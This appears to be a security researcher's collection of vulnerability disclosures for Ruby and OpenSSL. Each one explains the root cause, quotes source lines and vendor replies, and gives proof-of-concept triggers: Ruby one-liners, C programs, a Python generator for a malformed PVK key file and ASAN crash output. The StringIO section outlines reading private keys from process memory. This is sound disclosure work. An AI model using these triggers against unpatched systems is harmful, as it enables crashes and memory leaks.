Ruby vulnerability: heap corruption in string.c tr_trans() due to undersized buffer

Response by Ruby team: “severe but usual bug, not a vulnerability.”
Fixed in https://github.com/ruby/ruby/commit/cc9f1e919518edbee41d602ce215175f52f8f5f5

Configure with ASAN AddressSanitizer:

mkdir install; CFLAGS="-fsanitize=address" ./configure
--disable-install-doc --disable-install-rdoc --disable-install-capi
-prefix=`realpath ./install` && make -j4 && make install

Then execute:

$ ./ruby -e '"a".encode("utf-32").tr("b".encode("utf-32"),
"c".encode("utf-32"))'
=================================================================
==17122==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x602000014a98 at pc 0x7ff04065cf01 bp 0x7ffdfe7629b0 sp 0x7ffdfe7629a8
WRITE of size 4 at 0x602000014a98 thread T0
...
...

The actual corruption occurs here:

6196     TERM_FILL(t, rb_enc_mbminlen(enc));

Ruby vulnerability: heap corruption in DateTime.strftime() on 32 bit for certain format strings

Response by Ruby team: “severe but usual bug, not a vulnerability.”
Fixed in https://github.com/ruby/ruby/commit/58e8c9c895cc21473d6e46978666016a6e627d5f

Setting a very high precision in the date_strftime_with_tmx() function,
the following check (in the STRFTIME macro in date_strftime.c) will not
work as expected if s >= 0x80000000.

124         if (start + maxsize < s + precision) {          \
125             errno = ERANGE;                 \
126             return 0;                       \
127         }

This code causes a crash on my 32 bit system:

require 'date'
DateTime.now.strftime("%2147483647c")

64 bit is probably not affected (technically possible, but
unlikely).

Ruby vulnerability: StringIO strio_getline() may divulge arbitrary process memory

Originally reported privately to Ruby on 4 Jun 2016
Testing was done on Ruby 2.3.1 in 32 bit VM
Ruby has expressly allowed me to talk publicly about this issue while a fix is being prepared

The problem is this line in ext/stringio/stringio.c strio_getline():

1002     if (limit > 0 && s + limit < e) {
1003     e = rb_enc_right_char_head(s, s + limit, e, get_enc(ptr));
1004     }

This works as intended as long as the sum of s (pointer) and limit
(long) doesn’t overflow. So if on a 32 bit system ‘s’ happens to be
0xBF000000, and limit is 0x7FFFFFFF, the sum of both values is
0x3EFFFFFF, which is a completely unrelated address. From there, there
are several paths to be chosen from based on what the first parameter to
the function is (‘str’).

  1005      if (NIL_P(str)) {
            ...
            ...
  1008      else if ((n = RSTRING_LEN(str)) == 0) {
            ...
            ...
  1024      else if (n == 1) {
            ...
            ...
  1030      else {
            ...
            ...

All these paths eventually call strio_substr(). A wrong ‘pos’ parameter
to this function is not possible because it was checked earlier:

   996      if (ptr->pos >= (n = RSTRING_LEN(ptr->string))) {
   997      return Qnil;
   998      }

a wrong len parameter to this function doesn’t matter as it will
correct it itself:

    98  static VALUE
    99  strio_substr(struct StringIO *ptr, long pos, long len)
   100  {
   101      VALUE str = ptr->string;
   102      rb_encoding *enc = get_enc(ptr);
   103      long rlen = RSTRING_LEN(str) - pos;
   104  
   105      if (len > rlen) len = rlen;
   106      if (len < 0) len = 0;
   107      if (len == 0) return rb_str_new(0,0);
   108      return rb_enc_str_new(RSTRING_PTR(str)+pos, len, enc);
   109  }

As for the first path (str is nil, line 1005), it will call
strio_substr() with an invalid len value, which doesn’t matter because
strio_substr() corrects it:

  1005      if (NIL_P(str)) {
  1006      str = strio_substr(ptr, ptr->pos, e - s);
  1007      }

Within the second path (str is an empty string, line 1008), there is
the risk of an OOB read here, because this routine’s logic is based on
the belief that ‘e’ denotes the end of the buffer. ‘p’ will never become
‘e’ because either 1) a null pointer dereference will occur (once it
reads at address 0x00000000) or 2) no \n character is found before p reaches an invalid memory page. In theory an attacker could use this
mishap to find the \n character at various places in memory (by
adjusting the ‘limit’ variable), but that is usually not very useful.
(The way an attacker can know at which the \n character is found will
become clear later).

  1009      p = s;
  1010      while (*p == '\n') {
  1011          if (++p == e) {
  1012          return Qnil;
  1013          }
  1014      }
  1015      s = p;
  1016      while ((p = memchr(p, '\n', e - p)) && (p != e)) {
  1017          if (*++p == '\n') {
  1018          e = p + 1;
  1019          break;
  1020          }
  1021      }
  1022      str = strio_substr(ptr, s - RSTRING_PTR(ptr->string), e - s);

The third path (str is 1 character large, line 1024) is similar to the
second path except that memchr is used to find the desired character:

  1025      if ((p = memchr(s, RSTRING_PTR(str)[0], e - s)) != 0) {
  1026          e = p + 1;
  1027      }
  1028      str = strio_substr(ptr, ptr->pos, e - s);

The fourth path is entered if str is 2 or more bytes large (line
1030). The first condition is always true if a very high ‘limit’ value
is chosen (the premise of this vulnerability):

  1031      if (n < e - s) {

The first subpath is never true in this case:

  1032          if (e - s < 1024) {

So the second subpath is entered. This can be used to find the arbitrary
string str across the totality of virtual memory:

  1040          else {
  1041          long skip[1 << CHAR_BIT], pos;
  1042          p = RSTRING_PTR(str);
  1043          bm_init_skip(skip, p, n);
  1044          if ((pos = bm_search(p, n, s, e - s, skip)) >= 0) {
  1045              e = s + pos + n;
  1046          }
  1047          }

After any of these paths have been traversed, the attacker can read the
pos attribute to get the relative location of the string that has been
found somewhere in memory:

  1051      ptr->pos = e - RSTRING_PTR(ptr->string);

By subtracting this current pos from the previous pos the attacker
can know the position of string that was searched for relative to the
base string.

My hypothesis is that, if we assume that the attacker can control the
‘limit’ variable as well as the string that has to be searched for and
they can invoke strio_getline an arbitrary number of times, they can
make Ruby divulge arbitrary information such as private keys (if they
are loaded in memory), by searching for BEGIN PGP PRIVATE KEY BLOCK
and adjust the limit parameter in combination with all alphanumeric
characters to deduce the entire base64-encoded private key.

Note that a pointer address can naturally be very high (on 32 bit
anyway), such as 0xFFFF0000. In that event, a limit of 0x10000 can be
enough to overflow this computation:

1002     if (limit > 0 && s + limit < e) {

Here is code that can be used to trigger the vulnerability.

require "stringio"
s = StringIO.new
s.puts("abc")
s.rewind()
x = s.gets('xxx', 0x7FFFFFF0)
puts(s.pos)

The vulnerability is more likely to trigger on 32 bit than on 64 bit,
since on 32 bit, the chance that the base string is allocated beyond the
half of the virtual address space (0x80000000 or above, like 0xBF000000
in my initial example) than on 64 bit (where it needs to be allocated at
0x8000000000000000 or above). I did all of my testing on 32 bit.

OpenSSL X509_NAME_oneline memory corruption issues

Mem corruption due to oversized input

#include <openssl/x509.h>
#include <string.h>

int main(void)
{
    const size_t stringsize = 536870912;
    unsigned char* str = malloc(stringsize+1);
    if ( !str )
    {
        exit(1);
    }

    memset(str, 0x01, stringsize);
    str[stringsize] = 0x00;
    X509 * x509 = X509_new();
    X509_NAME * name = X509_get_subject_name(x509);
    X509_NAME_add_entry_by_txt(name, "friendlyName",  MBSTRING_ASC, str, -1, -1, 0);
    X509_NAME_oneline(name, 0, 0);
}

Proof that X509_NAME_oneline writes to buffer despite the len parameter being 0:

#include <openssl/x509.h>
#include <string.h>

int main(void)
{
    const size_t stringsize = 1024;
    unsigned char* str = malloc(stringsize+1);
    if ( !str )
    {
        exit(1);
    }

    memset(str, 'x', stringsize);
    str[stringsize] = 0x00;
    X509 * x509 = X509_new();
    X509_NAME * name = X509_get_subject_name(x509);
    X509_NAME_add_entry_by_txt(name, "friendlyName",  MBSTRING_ASC, str, -1, -1, 0);
    // Fictional buf ptr -- but wouldn't crash
    // if X509_NAME_oneline would adhere to the
    // fact that length is 0
    X509_NAME_oneline(name, (char*)1, 0);
}

OpenSSL: double-free after memory allocation in d2i_ASN1_bytes fails

#include <openssl/asn1.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    ASN1_STRING* a = ASN1_STRING_new();
    ASN1_STRING* b;
    unsigned char* pp;

    ASN1_STRING_set(a, "aa", -1);
    pp = malloc(0x80000000);
    if ( !pp )
    {
        printf("Allocation failure\n");
        return 0;
    }
    pp[0] = 0x01;
    pp[1] = 0x84;
    pp[2] = 0x7F;
    pp[3] = 0xFF;
    pp[4] = 0xFF;
    pp[5] = 0xFA;
    b = d2i_ASN1_bytes(&a, (const unsigned char**)&pp, 0x80000000, 1, 0);
    ASN1_STRING_free(a);

    return 0;
}
gcc d2i_ASN1_bytes_double_free.c -lcrypto; ulimit -v 4194304; ./a.out

Potential, if rare, double-free in OpenSSL crypto/evp/digest.c EVP_DigestInit_ex

The sequence of operations in the attached proof of concept will trigger
a double free.

This happens because:

214     if (ctx->digest != type) {
215         if (ctx->digest && ctx->digest->ctx_size)
216             OPENSSL_free(ctx->md_data);
217         ctx->digest = type;
218         if (!(ctx->flags & EVP_MD_CTX_FLAG_NO_INIT) && type->ctx_size) {
219             ctx->update = type->update;
220             ctx->md_data = OPENSSL_malloc(type->ctx_size);
221             if (ctx->md_data == NULL) {
222                 EVPerr(EVP_F_EVP_DIGESTINIT_EX, ERR_R_MALLOC_FAILURE);
223                 return 0;
224             }
225         }
226     }

Under particular circumstances ctx->md_data is freed but not set again,
and a subsequent call will free ctx->md_data again.

I'm not sure if the PoC represents something that could happen in a real
application, or whether other, saner paths towards this double free (or
perhaps use after free) exist. Either way, I advice setting ctx->md_data
to NULL after freeing it.

PoC:

#include <openssl/evp.h>
#include <openssl/bio.h>
#include <stdio.h>
int main(void)
{
    EVP_MD_CTX *mctx = NULL;
    EVP_PKEY_CTX *pctx = NULL;
    BIO *bmd = NULL;
    EVP_PKEY *sigkey = NULL;
    int errid = 0;
    int r;

    OpenSSL_add_all_digests();

    bmd = BIO_new(BIO_f_md());
    if ( bmd == 0 )
    {
        errid = 1;
        goto err;
    }
    if (!BIO_get_md_ctx(bmd, &mctx))
    {
        errid = 2;
        goto err;
    }
    if ( !EVP_DigestInit_ex(mctx, EVP_md5(), 0) )
    {
        errid = 3;
        goto err;
    }
    sigkey = EVP_PKEY_new_mac_key(EVP_PKEY_HMAC, 0, (unsigned char*)"aaaa", -1);
    if ( !sigkey )
    {
        errid = 4;
        goto err;
    }
    r = EVP_DigestSignInit(mctx, &pctx, 0, 0, sigkey);

    if (!r)
    {
        errid = 5;
        goto err;
    }
    if (!EVP_DigestInit_ex(mctx, EVP_md5(), 0))
    {
        errid = 6;
        goto err;
    }
    return 0;
err:
    printf("Error: %d\n", errid);
    return 1;

    return 0;
}

 

OpenSSL responded with:

“I do not believe this scenario would ever normally occur, i.e. only as a result of programmer error (you should not be mixing the EVP_DigestInit/EVP_DigestSignInit calls in that way). Therefore I will not be treating this as a security issue.
Nonetheless it seems prudent to set ctx->md_data to NULL after the free,
so I will apply a patch to that effect.

Public disclosure: malformed private keys lead to heap corruption in OpenSSL’s b2i_PVK_bio

The reason of this public disclosure

I’m all for responsible disclosure, and this is the route I almost always follow whenever I find a vulnerability in some application. I reported this one on February 24th, and on February 26th, in response to a different inquiry of mine, I was told that any reports submitted from there on had to wait until the next release. This one apparently didn’t make the cut. I respect the fact that the OpenSSL team has to conform to deadlines and schedules.
However, I’ve decided to publicly disclose this one because I think it’s not necessarily more secure to have vulnerable code running on servers for a month of more while attackers, if any (for this vulnerability), are not bound to release cycles and have the advantage of time.

Analysis of the vulnerability

In do_PVK_body, this allocation occurs:

695         enctmp = OPENSSL_malloc(keylen + 8);

a while later this memcpy occurs:

705         memcpy(enctmp, p, 8);

The memcpy presumes that enctmp is at least 8 bytes large. However, if
keylen is (2**32)-8 == 0xFFFFFFF9 at the time of the allocation, then
0xFFFFFFF9 + 8 == 1 byte is effectively allocated.

‘keylen’ is set by b2i_PVK_bio() (the function that calls do_PVK_body)
via do_PVK_header:

(in b2i_PVK_bio)

761     if (!do_PVK_header(&p, 24, 0, &saltlen, &keylen))
762         return 0;

do_PVK_header:

616 static int do_PVK_header(const unsigned char **in, unsigned int length,
617                          int skip_magic,
618                          unsigned int *psaltlen, unsigned int *pkeylen)
619 {
...
...
...
644     *psaltlen = read_ledword(&p);
645     *pkeylen = read_ledword(&p);
...
...
...
654 }

As you can see, keylen is retrieved from the input file directly.

After do_PVK_header has been called by b2i_PVK_bio, and thus saltlen,
keylen have been set, this allocation occurs:

763     buflen = (int)keylen + saltlen;
764     buf = OPENSSL_malloc(buflen);

OPENSSL_malloc will only succeed if buflen > 0. In order to pass this
allocation, the attacker may set the following values for keylen and
saltlen in the file that is being processed:

saltlen: 0x0000000A
keylen: 0xFFFFFFF9

which results in an allocation of 3 bytes here.

This implies that the post-header data of the file is at least 3 bytes:

770     if (BIO_read(in, buf, buflen) != buflen) {
771         PEMerr(PEM_F_B2I_PVK_BIO, PEM_R_PVK_DATA_TOO_SHORT);
772         goto err;
773     }

Back to do_PVK_body:

695         enctmp = OPENSSL_malloc(keylen + 8);
696         if (!enctmp) {
697             PEMerr(PEM_F_DO_PVK_BODY, ERR_R_MALLOC_FAILURE);
698             goto err;
699         }
700         if (!derive_pvk_key(keybuf, p, saltlen,
701                             (unsigned char *)psbuf, inlen))
702             goto err;
703         p += saltlen;
704         /* Copy BLOBHEADER across, decrypt rest */
705         memcpy(enctmp, p, 8);
706         p += 8;
707         if (keylen < 8) {
708             PEMerr(PEM_F_DO_PVK_BODY, PEM_R_PVK_TOO_SHORT);
709             goto err;
710         }

derive_pvk_key will attempt to read 10 bytes from ‘p’. Since the payload
is only 3 bytes, this is an overread of 7 bytes. Hardened/ASAN
builds will crash, but other than that this typically shouldn’t
give any problems.

Then memcpy will corrupt the memory around ‘enctmp’ because it consists
of only 1 byte while trying to write 8 bytes.

Here is a PoC:

#!/usr/bin/env python
import sys
MS_PVKMAGIC         = '\x1e\xf1\xb5\xb0'
reserved            = '\x00' * 4
is_encrypted        = '\x01\x00\x00\x00'
saltlen             = '\x0A\x00\x00\x00'
keylen              = '\xF9\xFF\xFF\xFF'
header = "".join([MS_PVKMAGIC, reserved, reserved, is_encrypted,
saltlen, keylen])
payload = '\x00' * 3

sys.stdout.write(header)
sys.stdout.write(payload)

Compile OpenSSL with -fsanitize=address and then:

$ python pvkgenkey.py | apps/openssl pkey -inform pv -passin pass:1234
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
=================================================================
==11842== ERROR: AddressSanitizer: heap-buffer-overflow on address
0x60040000de59 at pc 0x542666 bp 0x7ffc63024ff0 sp 0x7ffc63024fe8
READ of size 1 at 0x60040000de59 thread T0
...
...
...

This is the overread within derive_pvk_key. If you comment out that call for the sake of demonstration, ASAN will crash on the subsequent memcpy.

Note

I found CVE-2016-0799 (BIO_printf), CVE-2016-0797 (BN_hex2bn/BN_dec2bn) and this one all within about a week of reading the code while taking an opportunistic approach towards finding vulnerabilities (rather than doing a full audit in any meaningful sense of that word). Based on this, I’d wager that a good number of vulnerabilities may still be present.